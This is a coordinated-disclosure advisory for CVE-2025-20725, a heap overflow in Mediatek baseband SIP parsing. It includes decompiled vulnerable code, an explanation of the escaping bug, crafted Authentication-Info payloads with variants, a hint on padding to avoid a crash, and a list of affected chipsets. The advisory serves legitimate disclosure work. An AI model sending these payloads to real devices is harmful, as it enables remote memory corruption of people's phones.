An attacker sending a malformed SIP message over VoLTE to a device with a Mediatek baseband can trigger the vulnerability described here.

The impact is Heap Overflow in the baseband, triggered by malformed VoLTE message such as SIP INVITE or MESSAGE request.

The vulnerability described in this advisory affected a wide range of Mediatek devices. This vulnerability is assigned CVE-2025-20725.

Vulnerability Details

char * inet_msg_mime_quote(char *str) {
  char *slash_or_quote_ptr;
  char *src;
  char *dst;
  char curr;
  char *src_following;

  slash_or_quote_ptr = strpbrk(str,"\\\"");
  src_following = str;
  dst = str;
  if (slash_or_quote_ptr != NULL) {
    while (src = src_following, curr = *src, curr != '\0') {
      src_following = src + 1;
      if (curr != '\"') {
        if (curr != '\\') {
          src_following = src;
        }
        *dst = *src_following;
        dst = dst + 1;
        src_following = src_following + 1;
      }
    }
    *dst = '\0';
  }
  return str;
}

The pre-parser splits the lines by inserting string closing zeros over the \r characters, the \n remains intact. When a \ is seen the read pointer is incremented by two in the end of the loop, essentially “escaping” the terminating zero character.

The crash (== overwrite of the footer/following header) is avoidable with a proper " padding.

Example payload

a
Authentication-Info:qop=x\
1234567890

Variants:

a
Authentication-Info:nextnonce=\

a
Authentication-Info:rspauth=\

Note that a is the SIP request line.

Affected Devices

Includes most, possibly all, of the following devices:

MT6739, MT6761, MT6762, MT6762D, MT6762M, MT6763, MT6765, MT6765T, MT6767, MT6768, MT6769, MT6769K, MT6769S, MT6769T, MT6769Z, MT6771, MT6779, MT6781, MT6783, MT6785, MT6785T, MT6785U, MT6789, MT6813, MT6833, MT6833P, MT6835, MT6835T, MT6853, MT6853T, MT6855, MT6855T, MT6873, MT6875, MT6875T, MT6877, MT6877T, MT6877TT, MT6878, MT6878M, MT6879, MT6880, MT6883, MT6885, MT6886, MT6889, MT6890, MT6891, MT6893, MT6895, MT6895TT, MT6896, MT6897, MT6899, MT6980, MT6983, MT6983T, MT6985, MT6985T, MT6989, MT6989T, MT6990, MT6991, MT8666, MT8667, MT8673, MT8675, MT8676, MT8678, MT8765, MT8766, MT8766R, MT8768, MT8771, MT8781, MT8786, MT8788, MT8788E, MT8789, MT8791, MT8791T, MT8795T, MT8797, MT8798, MT8863, MT8873, MT8883, MT8893

Timeline

  • 2025.06.23. Bug reported to Mediatek PSIRT
  • 2025.07.23. Mediatek confirms vulnerability
  • 2025.07.23. Mediatek confirms CVE
  • 2025.09.01. TASZK informs Mediatek of advisory disclosure plan
  • 2025.10.01. Advisory release